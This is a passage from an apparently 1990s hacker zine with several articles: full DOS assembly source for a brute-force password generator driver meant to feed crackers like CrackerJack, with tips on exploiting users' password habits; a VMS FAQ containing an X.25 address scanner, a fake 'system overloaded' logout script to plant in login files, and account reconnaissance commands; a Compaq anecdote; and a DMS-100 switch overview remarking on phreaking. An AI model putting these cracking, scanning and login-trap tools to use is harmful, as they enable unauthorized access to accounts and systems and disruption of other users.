  815. 1.) Ophie vs. all the #hack guys, "10 Bucks on the Girl"
  816.  
  817.  
  818. ------------------------------------------------------------------------------
  819.  
  820. P A S S W O R D   E N G I N E  (for IBM PC's)                by Uncle Armpit
  821. +++++++++++++++++++++++++++++++++++++++++++++
  822.  
  823.    The device driver code listed below provides a data stream of passwords.
  824. The device driver approach was used to speed up the process
  825. of cracking passwords on an incremental basis. The usual approach was
  826. to generate the passwords to a file, then reading the file, etc..the device
  827. driver approach circumvents these file storage problems, and others, such as
  828. having enough free disk space and delays from disk i/o.
  829.     This driver operates completely in memory (approx. 0.5Kb)
  830.  
  831. How practical is this?
  832. ----------------------
  833. This program would be very useful if you think you may know what strategy
  834. the user/admin uses for picking out their passwords.  Without eliciting some
  835. sort of a strategy, forget it-- unless your desperate enough!!
  836.  
  837.  
  838. A "strategy" could consist of any of these possible advantages--
  839.  
  840. 1) default passwords (ie: SIN, student #, birth date, phone number...)
  841. 2) the mutation of a lUSERs' known password from another system
  842. 3) viewing the mark typing in most of their password with a couple
  843.    of unseen characters
  844. 4) etc...
  845.  
  846. ---------------------------
  847.   With the sample device driver provided, passwords starting at
  848. 'aaaaaaa' and ending with 'zzzzzzz' will be generated.  The length
  849. of the password string can be modified by changing the length of
  850. the password string itself (that is, the variable "number").  The
  851. range of characters in the passwords can also be changed by
  852. modifying the following two lines:
  853.  
  854. ;hackdrv.sys
  855. ;.
  856. ;.
  857. ;
  858. for ending character--
  859. cmp byte ptr [number+si],'z'+1 ;+1 past ending char. in range
  860.  
  861. ...and for starting character
  862. cmp byte ptr [number+si],'a'   ;starting char. in range
  863. ;
  864. ;----------------------
  865.  
  866. for instance, if you wished to generate numbers from "0000000" to
  867. "9999999"
  868.  
  869. -change the ending character to:
  870. cmp byte ptr [number+si],'9'+1
  871.  
  872. -starting character to:
  873. cmp byte ptr [number+si],'0'
  874.  
  875. and "number" variable from 'aaaaaa' to '0000000' and then
  876. recompile..
  877.  
  878. -----
  879.  
  880.  ..or in the third case, if u had observed a lUSER type in most of
  881. their password, you may want to rewrite the code to limit the
  882. search.  IE: limit the keys to a certain quadrant of the keyboard.
  883.    Modify the code starting at "reiterate:"  and ending at "inc_num
  884. endp" for this.
  885. =================================================================
  886.  
  887.  
  888. /'nuff of this!/   How do I get things working?
  889. -----------------------------------------------
  890.  
  891. Compile the device driver "hackdrv.sys", and the second program,
  892. "modpwd.asm". Then specify the device driver inside config.sys
  893. (ie: "c:\hackdrv.sys").  The code below was compiled with the a86
  894. compiler, v3.03.  Some modifications might be needed to work with
  895. other compilers.
  896.  
  897. To use it in prgs like crackerjack, type in the following on the
  898. command line:
  899.  
  900.  
  901. c:\>jack -pwfile:<your password file here!> -word:hackpwd
  902.  
  903. ------
  904.  If you had stopped a cracker program (eg: crackerjack) and want to
  905. pick up from where you left off, run the program "modpwd.com".
  906.  
  907.  This program can change HACKDRVs password through-
  908.  
  909.  a) a command line argument (ie: "modpwd aabbbbe")
  910.  b) executing the program with no parameters (this method also
  911.     displays the current password in memory)
  912.  
  913.  
  914.  
  915.                                                    Happy Hacking,
  916.                                                    Uncle Armpit
  917.  
  918. ;-----------------------cut here--------------------------------
  919. ;Program HACKDRV.SYS
  920. ;
  921. org 0h
  922. next_dev dd -1
  923. attribute dw 0c000h            ;character device w/ ioctl calls
  924. strategy dw dev_strategy
  925. interrupt dw dev_int
  926. dev_name db 'HACKPWD '
  927. countr dw offset number
  928. number db 'aaaaaa',0ah         ;<----six characters, lower case
  929. numsize equ $-number - 2
  930. afternum:
  931.  
  932. ;working space for device driver
  933. rh_ofs dw ?
  934. rh_seg dw ?
  935.  
  936. dev_strategy:               ;strategy routine
  937. mov cs:rh_seg,es
  938. mov cs:rh_ofs,bx
  939. retf
  940.  
  941. dev_int:                    ;interrupt routine
  942. pushf
  943. push ds
  944. push es
  945. push ax
  946. push bx
  947. push cx
  948. push dx
  949. push di
  950. push si
  951.  
  952. cld
  953. push cs
  954. pop ds
  955.  
  956. mov bx,cs:rh_seg
  957. mov es,bx
  958. mov bx,cs:rh_ofs
  959.  
  960. mov al,es:[bx]+2
  961. rol al,1
  962. mov di,offset cmdtab
  963. xor ah,ah
  964. add di,ax
  965. jmp word ptr[di]
  966.  
  967.  
  968. cmdtab:            ;command table
  969. dw init        ;0
  970. dw exit3       ;1
  971. dw exit3       ;2
  972. dw ioctl_read  ;3
  973. dw do_read     ;4
  974. dw exit3       ;5
  975. dw exit3       ;6
  976. dw exit3       ;7
  977. dw exit3       ;8
  978. dw exit3       ;9
  979. dw exit3       ;10
  980. dw exit3       ;11
  981. dw ioctl_write ;12
  982. dw exit3       ;13
  983. dw 5 dup (offset exit3)
  984.  
  985.  
  986.  
  987. ioctl_read:
  988. push es
  989. push bx
  990.  
  991. mov si,es:[bx+10h]
  992. mov di,es:[bx+0eh]
  993. mov es,si
  994.  
  995. push cs
  996. pop ds
  997. mov si,offset number
  998. xor cx,cx
  999.  
  1000. get_char:
  1001. lodsb
  1002. stosb
  1003. inc cl
  1004. cmp al,0ah
  1005. jz ioctl_rend
  1006. jmp get_char
  1007.  
  1008. ioctl_rend:
  1009. pop bx
  1010. pop es
  1011. mov es:[bx+012h],cx
  1012. mov cs:countr,offset number
  1013. jmp exit2
  1014.  
  1015. ioctl_write:
  1016. push es
  1017. push bx
  1018. mov si,es:[bx+010h]
  1019. mov ds,si
  1020. mov si,es:[bx+0eh]
  1021. mov cx,numsize+1               ;es:[bx+012h]
  1022. push cs
  1023. pop es
  1024. mov di,offset number
  1025. repe movsb
  1026. pop es
  1027. pop bx
  1028. mov cs:countr,offset number
  1029. jmp exit2
  1030.  
  1031.  
  1032. do_read:
  1033. push es
  1034. push bx
  1035.  
  1036.  
  1037. push cs
  1038. pop ds
  1039.  
  1040. mov si,[countr]
  1041. inc si                      ;word ptr [countr]
  1042. cmp si,offset afternum
  1043. jnz is_okay
  1044. mov si,offset number
  1045. call inc_num
  1046.  
  1047.  
  1048. is_okay:
  1049. mov [countr],si
  1050. mov di,es:[bx]+0eh
  1051. mov ax,es:[bx]+010h
  1052. mov cx, es:[bx]+012h
  1053. jcxz clean_up
  1054. mov es,ax
  1055. repe movsb
  1056.  
  1057. clean_up:
  1058. pop bx
  1059. pop es
  1060. jmp exit2
  1061.  
  1062.  
  1063. exit3: mov es:word ptr 3[bx],08103h
  1064. jmp exit1
  1065.  
  1066. exit2:
  1067. mov es:word ptr 3[bx],0100h
  1068.  
  1069. exit1:
  1070. pop si
  1071. pop di
  1072. pop dx
  1073. pop cx
  1074. pop bx
  1075. pop ax
  1076. pop es
  1077. pop ds
  1078. popf
  1079. retf
  1080. exit:
  1081.  
  1082. inc_num proc near
  1083.  push si
  1084.  mov si,numsize
  1085.  
  1086.  reiterate:
  1087.   inc byte ptr [number+si]
  1088.   cmp byte ptr [number+si],'z'+1    ;+1 past ending char. in range
  1089.   jnz _exit
  1090.   mov byte ptr [number+si],'a'      ;starting char. in range
  1091.   dec si
  1092.   cmp si,-1
  1093.   jnz reiterate
  1094.   mov byte ptr [number],01ah        ;send EOF
  1095.  _exit:
  1096.   pop si
  1097.   ret
  1098. inc_num endp
  1099.  
  1100.  
  1101.  
  1102. at_eof:                        ; the non-resident code starts here
  1103.  
  1104. initial proc near
  1105. push es
  1106.  
  1107. push cs
  1108. pop ds
  1109.  
  1110. push cs
  1111. pop es
  1112.  
  1113. mov si,offset number
  1114. mov di,offset tmpnum
  1115. cld
  1116. _again:
  1117. lodsb
  1118. cmp al,0ah
  1119. jz _nomorechars
  1120. stosb
  1121. jmp _again
  1122.  
  1123. _nomorechars:
  1124. mov si,offset msgend
  1125. mov cx,4
  1126. repe movsb
  1127.  
  1128. mov ah,09             ;print welcome message
  1129. mov dx,offset msg1
  1130. int 21h
  1131.  
  1132. pop es
  1133. ret
  1134. initial endp
  1135.  
  1136. init: call initial
  1137. mov ax,offset at_eof
  1138. mov es:[bx]+0eh,ax
  1139. push cs
  1140. pop ax
  1141. mov es:[bx]+010h,ax
  1142. mov cs:word ptr cmdtab,offset exit3
  1143. jmp exit2
  1144.  
  1145.  
  1146. msg1    db "Incremental Password Generator (c)1995",0ah,0dh
  1147.         db "Written by Uncle Armpit",0ah,0dh,0ah,0dh
  1148.         db "Starting at word ["
  1149. tmpnum  db 10 dup (?)
  1150. msgend  db "]",0a,0d,'$'
  1151. ;END hackdrv.sys
  1152.  
  1153. ;------------------------------cut here----------------------------------
  1154.  
  1155. ;PROGRAM modpwd.asm
  1156. ;
  1157. org 0100h
  1158. mov ax,03d02h
  1159. xor cx,cx
  1160. mov dx,offset devname
  1161. int 21h
  1162. jnc drvr_found
  1163.  
  1164. mov ah,09
  1165. mov dx,offset no_drvr
  1166. int 21h
  1167. jmp error_pass
  1168.  
  1169.  
  1170. drvr_found:
  1171. mov bx,ax
  1172. mov ax,04402h
  1173. mov cx,20                   ;read 20 characters
  1174. mov dx,offset databuffr
  1175. int 21h
  1176.  
  1177. mov pass_len,al
  1178. dec al
  1179. mov ah,al
  1180. and al,0fh
  1181. mov cl,4
  1182. shr ah,cl
  1183. add ax,03030h
  1184. cmp al,'9'
  1185. jbe inrange
  1186. add al,7
  1187. inrange:
  1188. cmp ah,'9'
  1189. jbe inrange1
  1190. add ah,7
  1191. inrange1:
  1192. mov byte ptr [num_chr],ah
  1193. mov byte ptr [num_chr+1],al
  1194.  
  1195.  
  1196. cld
  1197. mov di,offset databuffr-1
  1198. xor cx,cx
  1199. mov cl,pass_len
  1200. add di,cx
  1201. mov si,offset pass_end
  1202. mov cx,stringsz
  1203. repe movsb
  1204.  
  1205. ;check for information in command line
  1206. ;else--> prompt for user input
  1207. mov al,pass_len
  1208. or byte ptr [0080h],0
  1209. jz req_input
  1210. mov cl,[0080h]
  1211. dec cl
  1212. mov [0081h],cl
  1213. mov si,0081h
  1214. mov di,offset newpass
  1215. mov cx,20
  1216. repe movsb
  1217. jmp vrfy_info
  1218.  
  1219. req_input:
  1220. mov ah,09
  1221. mov dx,offset cur_pass
  1222. int 21h
  1223.  
  1224. mov ah,0a
  1225. mov dx,offset pass_len
  1226. int 21h
  1227.  
  1228.  
  1229. vrfy_info:
  1230. mov ax,word ptr [pass_len]
  1231. cmp ah,0
  1232. jz error_pass
  1233. dec al
  1234. cmp ah,al
  1235. jnz error_len
  1236.  
  1237. ;change the current password
  1238. xor cx,cx
  1239. mov cl,al
  1240. mov ah,044h
  1241. mov al,03
  1242. mov dx,offset newpass+1
  1243. int 21h
  1244. jnc success_pass
  1245.  
  1246. error_len:
  1247. mov ah,09
  1248. mov dx,offset errormsg
  1249. int 21h
  1250.  
  1251. error_pass:
  1252. mov ax,04c01h                     ;abnormal termination
  1253. int 21h
  1254.  
  1255. success_pass:
  1256. mov ax,04c00h
  1257. int 21h
  1258.  
  1259.  
  1260. devhandle  dw ?
  1261. cur_pass   db 'Current password is ['
  1262. databuffr  db 20 dup (?)
  1263. pass_end   db ']      ;'
  1264. num_chr    db '  '
  1265.            db ' characters',0ah,0dh,0ah,0dh
  1266. prompt     db 'New word: ','$'
  1267. stringsz  equ $ - pass_end
  1268.  
  1269. pass_len   db 00
  1270. newpass    db 20 dup (?)
  1271. errormsg   db 'error changing password!',0ah,0dh,'$'
  1272. no_drvr    db 'Error: '
  1273. devname    db "HACKPWD ",00
  1274.            db 'device driver not loaded!',0ah,0dh,07,'$'
  1275.  
  1276.  
  1277. ------------------------------------------------------------------------------
  1278.  
  1279.          -- Frequently & Rarely asked questions about VMS -- part one
  1280.         by Opticon the Disassembled - UPi
  1281.  
  1282. [1]
  1283.  
  1284.  " I have a kropotkin.hlp file. What could I possibly do with it ? "
  1285.  
  1286. $ library /insert /help sys$help:helplib.hlb kropotkin.hlp
  1287. .
  1288. .
  1289. .
  1290. $ help kropotkin
  1291.  
  1292. [2]
  1293.  
  1294.  " I have a bakunin.tlb file. What to do with it ? "
  1295.  
  1296. $ library /extract=(*) bakunin.tlb
  1297. .
  1298. .
  1299. .
  1300. $ dir
  1301.  
  1302. [3]
  1303.  
  1304.  " I would like to have a look at prunton.dat. "
  1305.  
  1306. $ dump [/block=(count:x)] prunton.dat
  1307.  
  1308. Where "x" is the number of blocks DUMP will display.
  1309.  
  1310. [4]
  1311.  
  1312.  " How can I use an external editor with mail ? "
  1313.  
  1314. $ mail :== mail /edit=(send,reply=extract,forward)
  1315.  
  1316. [5]
  1317.  
  1318.  " How a HELP file is organized ? "
  1319.  
  1320. $ create example.hlp
  1321. 1 EXAMPLE
  1322.  
  1323.   THIS IS AN EXAMPLE.
  1324.  
  1325. 2 MORE_EXAMPLES
  1326.  
  1327.   MORE EXAMPLES.
  1328.  
  1329. 3 EVEN_MORE_EXAMPLES
  1330.  
  1331.   EVEN MORE EXAMPLES.
  1332. <CTRL-Z>
  1333.  
  1334. [6]
  1335.  
  1336.  " How can I have a look at queues ? "
  1337.  
  1338. $ show queue smtp /all/full
  1339.  
  1340. or
  1341.  
  1342. $ show queue /batch/all/full
  1343.  
  1344. or
  1345.  
  1346. $ show queue /all/full
  1347.  
  1348. [7]
  1349.  
  1350.  " My mail is holded, for some reason, in the SMTP queue... "
  1351.  
  1352. Either
  1353.  
  1354. $ delete /entry=XXX
  1355.  
  1356. or
  1357.  
  1358. $ set entry XXX /release
  1359.  
  1360. in order to force VMS to release it right away.
  1361.  
  1362. [8]
  1363.  
  1364.  " How do I have a look at DTE and circuits available. "
  1365.  
  1366. $ mc ncp show known dte
  1367.  
  1368. and
  1369.  
  1370. $ mc ncp show known circuits
  1371.  
  1372. You may also may find of interest:
  1373.  
  1374. $ mc ncp show known networks
  1375.  
  1376. $ mc ncp show known lines
  1377.  
  1378. $ mc ncp show known destinations
  1379.  
  1380. [9]
  1381.  
  1382.  " I need a NUA scanner for VMS. "
  1383.  
  1384. $ OPEN/READ VALUES SCAN.VAL
  1385. $ READ VALUES PRE
  1386. $ READ VALUES DTE
  1387. $ READ VALUES END
  1388. $ CLOSE VALUES
  1389. $ LOG = "SCAN.LIS"
  1390. $ TMP = "SCAN.TMP"
  1391. $ OPEN/WRITE FILE 'LOG
  1392. $ WRITE FILE "PREFIX:",PRE
  1393. $ WRITE FILE "START :",DTE
  1394. $ WRITE FILE "LAST  :",END
  1395. $LOOP:
  1396. $ ON ERROR THEN GOTO OPEN
  1397. $ SPAWN/NOWAIT/OUTPUT='TMP' SET HOST/X29 'PRE''DTE'
  1398. $ WAIT 00:00:06
  1399. $ SPAWN_NAME = F$GETJPI("","USERNAME")
  1400. $ SPAWN_NAME = F$EXTRACT(0,F$LOC(" ",SPAWN_NAME),SPAWN_NAME) + "_"
  1401. $ CONTEXT = ""
  1402. $FIND_PROC:
  1403. $ PID = F$PID(CONTEXT)
  1404. $ IF PID .EQS. "" THEN GOTO OPEN
  1405. $ IF F$LOC(SPAWN_NAME,F$GETJPI(PID,"PRCNAM")) .EQ. 0 THEN STOP/ID='PID
  1406. $ GOTO FIND_PROC
  1407. $OPEN:
  1408. $ ON ERROR THEN GOTO OPEN
  1409. $ OPEN/READ PAD 'TMP
  1410. $ MSSG = " Process stopped"
  1411. $ ON ERROR THEN GOTO CLOSE
  1412. $ READ PAD LINE
  1413. $ IF F$LOC("call clear",LINE) .LT. F$LEN(LINE) THEN READ PAD LINE
  1414. $ MSSG = F$EXTRACT(F$LOC(",",LINE)+1,80,LINE)
  1415. $CLOSE:
  1416. $ CLOSE PAD
  1417. $ DELETE 'TMP';*
  1418. $ IF F$LOC("obtain",MSSG).NE.F$LENGTH(MSSG) THEN GOTO NOCONN
  1419. $ WRITE FILE PRE,DTE,MSSG
  1420. $NOCONN:
  1421. $ DTE = DTE + 1
  1422. $ IF DTE .LE. END THEN GOTO LOOP
  1423. $ CLOSE FILE
  1424.  
  1425. ( I don't have a clue by whom the code was written. )
  1426.  
  1427. then
  1428.  
  1429. $ create scan.val
  1430. prefix
  1431. starting_NUA
  1432. ending_NUA
  1433. <CTRL-Z>
  1434. $ submit /noprint scan.com
  1435. .
  1436. .
  1437. .
  1438. $ search scan.lis "call connected"
  1439.  
  1440. [10]
  1441.  
  1442.  " How do I crash a VAX !? "
  1443.  
  1444. $ set default sys$system
  1445. $ @shutdown
  1446.  
  1447. or
  1448.  
  1449. $ set default sys$system
  1450. $ run opccrash
  1451.  
  1452. [11]
  1453.  
  1454.  " I have a dostogiefski.cld file; what do I do with it ? "
  1455.  
  1456. $ set command dostogiefski.cld
  1457.  
  1458. [12]
  1459.  
  1460.  " Can I send messages to interactive processes ? "
  1461.  
  1462. $ reply [/user=username] [/bell] [/id=xxxx] " Carlos Marigella "
  1463.  
  1464. [13]
  1465.  
  1466.  " How can I prevent someone from phoning me all the time ? "
  1467.  
  1468. $ set broadcast=(nophone)
  1469.  
  1470. [14]
  1471.  
  1472.  " Can I postpone/disable interactive logins ? "
  1473.  
  1474. $ set logins /interactive=0
  1475.  
  1476. $ set logins /interactive
  1477.  
  1478. will display current value.
  1479.  
  1480. Under the same `logic' :
  1481.  
  1482. $ create innocent_filename.com
  1483. $ set nocontrol
  1484. $ context = ""
  1485. $ pid = F$PID(context)
  1486. $ user_name = F$GETJPI(pid,"username")
  1487. $ wait 00:01:00.00
  1488. $ write sys$output ""
  1489. $ write sys$output " System overloaded; please try again later "
  1490. $ write sys$output " Logging out process ''pid', of user ''user_name' "
  1491. $ write sys$output ""
  1492. $ logout /full
  1493.  
  1494. Add either to sys$system:sylogin.com or sys$login:login.com the following:
  1495. " $ @innocent_filename.com ".
  1496.  
  1497. [15]
  1498.  
  1499.  " How can I modify the welcome file ? Where is it held ? "
  1500.  
  1501. $ set default sys$system
  1502. $ edit welcome.txt
  1503.  
  1504. [16]
  1505.  
  1506.  " I am editing a huge text file. How can I reach the end of it ? "
  1507.  
  1508. at the editor's prompt type:
  1509.  
  1510. *find end
  1511.  
  1512. or
  1513.  
  1514. *find "search string"
  1515.  
  1516. [17]
  1517.  
  1518.    " How can I be sure than noone is watching me from a hidden process ? "
  1519.  
  1520. $ show system /process
  1521. VAX/VMS V5.5-2  on node STIRNER  30-MAR-1937 02:10:41.94   Uptime  2 03:05:25
  1522.   Pid    Process Name    State  Pri      I/O       CPU       Page flts Ph.Mem
  1523. .
  1524. .
  1525. .
  1526. 00000114 SYMBIONT_4      HIB      5      290   0 00:00:19.05      1650     47
  1527. 00000117 SMTP_SYMBIONT   HIB      4    33398   0 00:16:49.67    246104    426
  1528. 00000118 SYMBIONT_6      HIB      4    47868   0 00:05:09.01       296    121
  1529. 00001255 SYMBIONT_0001   CUR 13  15    64293   0 00:05:08.12      1982    248
  1530.  
  1531. $ show system /full
  1532.  
  1533. VAX/VMS V5.5-2  on node STIRNER  30-MAR-1937 02:10:59.64   Uptime  2 03:05:43
  1534.   Pid    Process Name    State  Pri      I/O       CPU       Page flts Ph.Mem
  1535. .
  1536. .
  1537. .
  1538. 00000114 SYMBIONT_4      HIB      5      290   0 00:00:19.05      1650     47
  1539.          [1,4]
  1540. 00000117 SMTP_SYMBIONT   LEF      5    33407   0 00:16:49.78    246116    502
  1541.          [1,4]
  1542. 00000118 SYMBIONT_6      HIB      5    47872   0 00:05:09.03       296    121
  1543.          [1,4]
  1544. 00001255 SYMBIONT_0001   CUR 13  15    64348   0 00:05:09.60      2063    268
  1545.          [1,4]
  1546. $
  1547.  
  1548.  See the difference between system's SYMBIONT processes ( i.e. SYMBIONT_4,
  1549.  SYMBIONT_6, SMTP_SYMBIONT ) and the one created by using a `stealth' program
  1550.  ( SYMBIONT_0001 ); the names and the User Identification Codes may vary, but
  1551.  state, priority, physical memory used, page faults, input/output and Process
  1552.  IDentification numbers, can reveal, in combination, such a nastyness.
  1553.  
  1554.  Afterwards you may " show process /id=xxxx /continuous ",
  1555.  or " stop /id=xxxx ".
  1556.  
  1557. [18]
  1558.  
  1559.    " Can I view the CPU usage of each process ? "
  1560.  
  1561. $ monitor processes /topcpu
  1562.  
  1563. will display a bar-chart of this kind.
  1564.  
  1565. [19]
  1566.  
  1567.    Run the following .COM file and it will display information you'd
  1568.  possibly need on an account and/or node. It uses simple lexical functions.
  1569.  
  1570. $ output :== write sys$output
  1571. $ output ""
  1572. $ node_id = F$CSID(context)
  1573. $ nodename = F$GETSYI("nodename",,node_id)
  1574. $ if F$GETSYI("cluster_member") .EQS. "TRUE"
  1575. $ then output " ''nodename' is a member of a cluster. "
  1576. $ else output " ''nodename' is not a member of a cluster. "
  1577. $ context = ""
  1578. $ username = F$GETJPI("","username")
  1579. $ output " Username : ''username' "
  1580. $ group = F$GETJPI("","grp")
  1581. $ output " Group : ''group' "
  1582. $ uic = F$USER()
  1583. $ output " User Identification Code : ''uic' "
  1584. $ pid = F$PID(context)
  1585. $ output " Process IDentification : ''pid' "
  1586. $ process = F$PROCESS()
  1587. $ output " Process Name : ''process' "
  1588. $ terminal = F$GETJPI("","terminal")
  1589. $ output " Terminal Name : ''terminal' "
  1590. $ priority = F$GETJPI("","authpri")
  1591. $ output " Authorized Priority : ''priority' "
  1592. $ maxjobs = F$GETJPI("","maxjobs")
  1593. $ output " Maximum Number of Processes Allowed : ''maxjobs' "
  1594. $ authpriv = F$GETJPI("","authpriv")
  1595. $ output " Authorized Privileges : ''authpriv' "
  1596. $ curpriv = F$GETJPI("","curpriv")
  1597. $ output " Current Privileges : ''curpriv' "
  1598. $ directory = F$DIRECTORY()
  1599. $ output " Directory : ''directory' "
  1600. $ protection = F$ENVIRONMENT("protection")
  1601. $ output " Protection : ''protection' "
  1602. $ boottime = F$GETSYI("boottime")
  1603. $ output " Boot Time : ''boottime' "
  1604. $ time = F$TIME()
  1605. $ output " Current Time : ''time' "
  1606. $ version = F$GETSYI("version")
  1607. $ output " VMS version : ''version' "
  1608. $ output ""
  1609.  
  1610.  You may :
  1611.  
  1612. $ library /extract=(lexicals) /output=lexicals.hlp sys$help:helplib.hlb
  1613.  
  1614. and then transfer lexicals.hlp.
  1615.  
  1616. [20]
  1617.  
  1618.     " How can I view/modify my disk quota limit ? "
  1619.  
  1620.  DiskQuota was a standalone utility in versions prior to five; It is now
  1621.  a subset of the System Management utility, and thus you should :
  1622.  
  1623. $ set def sys$system
  1624. $ run sysman
  1625. SYSMAN> diskquota show /device=dua1: [1,1]
  1626. %SYSMAN-I-QUOTA, disk quota statistics on device DUA1: --
  1627. Node
  1628.      UIC                  Usage        Permanent Quota   Overdraft Limit
  1629. [1,1]                     123456       1500000           100
  1630.  
  1631. SYSMAN> diskquota modify /device=dua1: [1,1] /permquota=654321 /overdraft=1000
  1632.  
  1633. [END]
  1634.  
  1635.    Post Scriptum
  1636.  
  1637.    Some operations require privileges.
  1638.  
  1639.  
  1640. ------------------------------------------------------------------------------
  1641.  
  1642. Compaq CEO blunders on TV
  1643.  
  1644.           Compaq CEO Eckard Pfeiffer last week visited The Netherlands
  1645.           to do some pr work. During a television interview for NOVA,
  1646.           a well known news show that aired last Friday, Pfeiffer
  1647.           claimed that pc's were easy to use, and could be used by
  1648.           virtually anyone. So, the reporter asked him to switch the
  1649.           tv channel on a Presario that was next to Pfeiffer that ran
  1650.           a Windows-based TV tuner. The result was Pfeifer frantically
  1651.           clicking on several menu bars, but instead of switching
  1652.           channels, he exited the program altogether. To make things
  1653.           worse, the reporter next asked him to start up a word
  1654.           processor.  Again, Pfeiffer, clicked his way around the
  1655.           desktop, but couldn't find nor start the program. Finally,
  1656.           he was asked to start up a game. You saw Pfeifer (now in
  1657.           deep trouble) clicking on all the tabs of the "easy to use"
  1658.           tab-works interface that is included on all Presario's,
  1659.           looking for games, while muttering "Were are ze games? I
  1660.           can't find ze games on zis machine!!!", his accent becoming
  1661.           increasingly more German then before. It was almost like Dr.
  1662.           Strangelove. The last shot is of a Compaq tech support guy,
  1663.           rushing in to help him out....  So much for ease of use....
  1664.  
  1665. Voorburgwal 129, 1012 EP
  1666. Amsterdam, The Netherlands).
  1667.  
  1668. ------------------------------------------------------------------------------
  1669.  
  1670. Ok, I'm going to assume that you already know a little bit about what it
  1671. is you're reading.  The DMS100/IBN (integrated business network) is
  1672. composed of mainly electronic business sets, phones, data units, and
  1673. attendant consoles and units, all physically at the customers place of
  1674. business.  While the digital switching software and support hardware is
  1675. located at the Telco.  Together, in tandem they work to give the customer
  1676. one of the best combinations of features and benefits.  The DMS-100
  1677. combines voice AND data in one business comunications package.  One of
  1678. the many advantages is it offers the use with *any* sized business with
  1679. up to 30,000 lines.  The IBN system controls most operations, diagnoses
  1680. problems, and also has the ability to do limited repairs on itself.
  1681. Being modular, it can meet the needs at hand, and have the ability for
  1682. new features, as time goes by, while still maintaining a cost-effective
  1683. environment.  Another advantage is that is uses a central attendant where
  1684. and when needed.  Along with Call Routing, or CDR, to control and
  1685. restrict Long Distnace Calling, and network management.  The IBN gives
  1686. the user hassle free operation.  Northern Telcom's DMS-100 switches,
  1687. which by the way are digital, are frequently backed-up by their
  1688. *higher trained* personnel, which isnt saying much.  Some other features
  1689. are: Automatic Routing Selection, or ARS, which routes the long distance
  1690. calls, if they are even allowed, over the most economical (right) route
  1691. available.  Station Message Detail Recording, or SMDR, which basically
  1692. does just what its name states, records long distance charges, including
  1693. but not limited to, originating number, time and length of call,
  1694. authorization code, and others...  Yet another capability is the Direct
  1695. Inward System Access (DISA), which gives the personnel the ability to use
  1696. the system to place long distance calls cheaply, even from outside the
  1697. company (sounds like a PBX a bit doesn't it?).
  1698. System Features and Benefits:  There are 6 Call Waiting Lamp Loop Keys,
  1699. each with its associated source AND destination lamp to signify the
  1700. status of both the calling and the called party status.  The Second
  1701. feature is Alpha Numeric Display Multiple Directory Number Feature Keys,
  1702. up to 42 of them, which can be used for a Paging System, or speed
  1703. dialing, and things along those lines.  A third feature is the release
  1704. Source/Release Destination Console, which features access to paging.
  1705. Other features which mainly are unimportant I will list here, they are:
  1706. Call Identifier Exclude Source/Exclude Destination.  Remote Console Call
  1707. Destination.  Signal Source.Signal Destination.  Call Holding.  Call
  1708. Detail Entry.  Remote Console Call Selection.  Console Display.  Camp-on
  1709. Automatic Recall Conference.  A 6 port 2 way splitting non-delayed
  1710. operation.  Busy Verification of Lines.  Manual and Automatic Hold.
  1711. Multiple Console OPeration.  Busy verification of trunks. Switched Loop
  1712. Operation.  Trunk Group Busy Indication.  Uniform Call distribution form
  1713. queue.  Multiple listed directory numbers.  Control of trunk group
  1714. access.  Secrecy.  Night Service.  Serial call.  Speed Calling.  Lockout.
  1715.  Delayed Operation.  Position Busy.  Interposition Calling.  THrough Call
  1716. Pickup.  RIng Again.  Multiple Directory Numbers.  Intercom.  Speed
  1717. Call.  Call Transfer/Conference.  On-Hook Dialing.  Additional
  1718. Programmable Features include automatic hold.  Listem-on hold.  Multiple
  1719. Appearance Directory Numbers, or MADN.  Single Call Arrangement.
  1720. Multiple Call Arrangement.  Privacy Release.  Tone Ringing with Volume
  1721. Control.  Call Waiting.  Stored Number Redial.  Private Business Line.
  1722. And Finally a 32 character alphanumeric data unit.  The DMS100/IBN can be
  1723. used as a "standalone" or can be attached to the business set or other
  1724. phone type unit.  It has the ability to transmit over a two wire loop, at
  1725. speeds of up to 56 kb per second, using a proprietary time compression
  1726. multiplexing technology.  The DMS100 is also available in different
  1727. models to suit existing terminal capacities.  It also provides integrated
  1728. voice/data, that right data, communications.  They, the phone company,
  1729. and data unit, can operate together, simultaniously, or even independant
  1730. of one another.  Being fully digitized, it was one if the first switches
  1731. to eliminate the use of those dinosaur analog modems (for which i still
  1732. have a few if anyone wants to buy em off me or give me shipping money and
  1733. ill send em to ya free).  Well thats it for now.  This should give you a
  1734. good understanding of the capabilities of one of the many switches in use
  1735. today.  In fact, although outdated somewhat, my telco, citizens
  1736. utilities, and one in stockton from what i just found out, is still using
  1737. this switch (poor me in elk grove, ca eh?)
  1738. which makes phreaking quite an easy task, not that it was really ever
  1739. hard but anything to make it easier help.  ANyway, if you have any
  1740. comments/flames/general bullshit, mail it to either
  1741. jmatrix@mindvox.phantom.com or capthook@sekurity.com the latter being a
  1742. last resort email address.
  1743. ciao
  1744.                                              ---Captain Hook
  1745.  
  1746. ------------------------------------------------------------------------------